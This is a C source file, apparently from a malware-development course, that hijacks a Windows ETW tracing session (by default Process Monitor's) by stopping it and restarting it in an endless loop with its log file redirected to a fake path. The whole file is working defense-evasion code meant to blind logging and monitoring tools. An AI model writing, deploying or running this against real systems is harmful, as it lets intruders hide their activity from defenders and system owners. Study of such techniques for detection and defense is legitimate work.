// @NUL0x4C | @mrd0x : MalDevAcademy

//\
	Reference:																														\
https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/winbase/Eventing/Controller/tracelog.c

#include <Windows.h>
#include <stdio.h>
#include <conio.h>
#include <strsafe.h>
#include <wmistr.h>
#include <shellapi.h>
#include <tchar.h>
#include <evntrace.h>

// Session name to hijack:
//
#define	ETW_SESSION_TO_HIJACK	L"PROCMON TRACE"
//\
#define	ETW_SESSION_TO_HIJACK	L"MALDEVACAD_DOT_NET_ETW"


#define MAXSTR					1024
#define MAXIMUM_LOGGERS			64					   // Max number of running sessions on the system		
#define FAKE_LOG_FILE			L"C:\\FakeLogFile.etl" // The string should be smaller than MAXSTR


// Return TRUE if the trace file name matches that of our FAKE_LOG_FILE
BOOL IsSessionHijacked(IN PEVENT_TRACE_PROPERTIES LoggerInfo) {
	LPTSTR LogFileName = (LPTSTR)((PCHAR)LoggerInfo + LoggerInfo->LogFileNameOffset);
	return (*(ULONG_PTR*)LogFileName != NULL && wcscmp(LogFileName, FAKE_LOG_FILE) == 0) ? TRUE : FALSE;
}


VOID HijackEtwSession(IN PEVENT_TRACE_PROPERTIES LoggerInfo) {
	
	ULONG			uError			= ERROR_SUCCESS;
	TRACEHANDLE		LoggerHandle	= NULL;
	LPTSTR			LogFileName		= NULL;
	
	// The session may be hijacked, but we need to continue running the hijack routine in case the logger process was restarted.
	// Thus the code is executed inside of an infinite while loop
	while (1){

		// Check if the target session is running
		if ((uError = QueryTraceW((TRACEHANDLE)0, ETW_SESSION_TO_HIJACK, LoggerInfo)) != ERROR_SUCCESS && uError != ERROR_WMI_INSTANCE_NOT_FOUND) {
			printf("\t[-] QueryTraceW Failed With Error %d \n", uError);
			return;
		}

		// If the session is not found, sleep (waiting for it to come online)
		if (uError == ERROR_WMI_INSTANCE_NOT_FOUND) {
			// You can construct a timeout here ...
			goto _DelayExecution;
		}

		// Session already hijacked
		/*
		if (IsSessionHijacked(LoggerInfo)) {
			printf("\t[+] Tracing session is already hijacked \n");
			goto _DelayExecution;
		}
		*/

		printf("\t[i] Restarting Target Session With Hijacked Settings: \n");

		// Stopping the tracing session
		wprintf(L"\t\t>>> Stopping The \"%s\" Session ... ", ETW_SESSION_TO_HIJACK);
		if ((uError = StopTraceW((TRACEHANDLE)0, ETW_SESSION_TO_HIJACK, LoggerInfo)) != ERROR_SUCCESS) {
			printf("\t[-] StopTraceW Failed With Error %d \n", uError);
			return;
		}
		printf("[+] DONE \n");

		// Copying 'FAKE_LOG_FILE' to an address equal to (LoggerInfo + LogFileNameOffset), thus constructing a trace file path 
		wprintf(L"\t\t>>> Updating The Trace File Name To \"%s\" ... ", FAKE_LOG_FILE);
		LogFileName = (LPTSTR)((PCHAR)LoggerInfo + LoggerInfo->LogFileNameOffset);
		wcscpy_s(LogFileName, MAXSTR, FAKE_LOG_FILE);
		printf("[+] DONE \n");

		// Start the trace session with the updated properties
		wprintf(L"\t\t>>> Starting The \"%s\" Session With Fake Settings ... ", ETW_SESSION_TO_HIJACK);
		if ((uError = StartTraceW(&LoggerHandle, (LPCWSTR)ETW_SESSION_TO_HIJACK, LoggerInfo)) != ERROR_SUCCESS) {
			printf("\t[-] StartTraceW Failed With Error %d \n", uError);
			return;
		}
		printf("[+] DONE \n");

_DelayExecution:
		Sleep(500 * 1);
	}

}



int main() {

	PEVENT_TRACE_PROPERTIES		LoggerInfo[MAXIMUM_LOGGERS]			= { 0 };
	PEVENT_TRACE_PROPERTIES		Storage								= NULL,
								FixedStoragePntr					= NULL;

	// Max size, in bytes, of one element
	ULONG	SizeForOneProperty	= sizeof(EVENT_TRACE_PROPERTIES) + 2 * MAXSTR * sizeof(TCHAR);
	// Max size, in bytes, of all potential returned trace sessions
	ULONG	SizeNeeded			= MAXIMUM_LOGGERS * SizeForOneProperty;
	ULONG	uStatus				= ERROR_SUCCESS;
	ULONG	ReturnCount			= NULL;
	LPTSTR	LoggerName			= NULL;
	BOOL	bFound				= FALSE;

	// Allocate enough memory to hold the maximum number of tracing sessions
	Storage = (PEVENT_TRACE_PROPERTIES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SizeNeeded);
	if (Storage == NULL)
		return -1;
	
	// Save a pointer to the allocated memory to free later on
	FixedStoragePntr = Storage;

	// Initialize every 'EVENT_TRACE_PROPERTIES' struct 'Storage' in and save it to the 'LoggerInfo' array
	for (ULONG LoggerCounter = 0; LoggerCounter < MAXIMUM_LOGGERS; LoggerCounter++) {

		// Populate the required elements
		Storage->Wnode.BufferSize	= SizeForOneProperty;
		Storage->LoggerNameOffset	= sizeof(EVENT_TRACE_PROPERTIES);
		Storage->LogFileNameOffset	= sizeof(EVENT_TRACE_PROPERTIES) + MAXSTR * sizeof(TCHAR);

		// Save the pointer to the array
		LoggerInfo[LoggerCounter]	= Storage;

		// Move to the next allocated structure
		Storage = (PEVENT_TRACE_PROPERTIES)((PUCHAR)Storage + Storage->Wnode.BufferSize);
	}

	// Query all the running tracing session
	uStatus = QueryAllTracesW(LoggerInfo, MAXIMUM_LOGGERS, &ReturnCount);
	if (uStatus == ERROR_SUCCESS) {
		// Looping through the returned tracing session 
		for (ULONG LoggerCounter = 0; LoggerCounter < ReturnCount; LoggerCounter++) {

			// Calculating the address of the tracing session name using its offset
			if ((LoggerInfo[LoggerCounter]->LoggerNameOffset > 0) && (LoggerInfo[LoggerCounter]->LoggerNameOffset < LoggerInfo[LoggerCounter]->Wnode.BufferSize)) 
				LoggerName = (LPTSTR)((PUCHAR)LoggerInfo[LoggerCounter] + LoggerInfo[LoggerCounter]->LoggerNameOffset);
			else 
				LoggerName = NULL;

			// Compare the name fetched to that of the session to hijack
			if (LoggerName != NULL && wcscmp(LoggerName, ETW_SESSION_TO_HIJACK) == 0) {
				
				// If found
				printf("[i] Found target ETW tracing session, hijacking ...\n");
				// Call 'HijackEtwSession', passing a pointer to the 'EVENT_TRACE_PROPERTIES' structure of the target tracing session
				// It is better to use CreateThread
				HijackEtwSession(LoggerInfo[LoggerCounter]);
				
				bFound = TRUE;
				break;
			}

		}
	}

	if (!bFound) {
		wprintf(L"[-] The Session \"%s\" Was Not Found \n", ETW_SESSION_TO_HIJACK);
	}

	// Free allocated buffer
	HeapFree(GetProcessHeap(), 0, FixedStoragePntr);
	return 1;
}

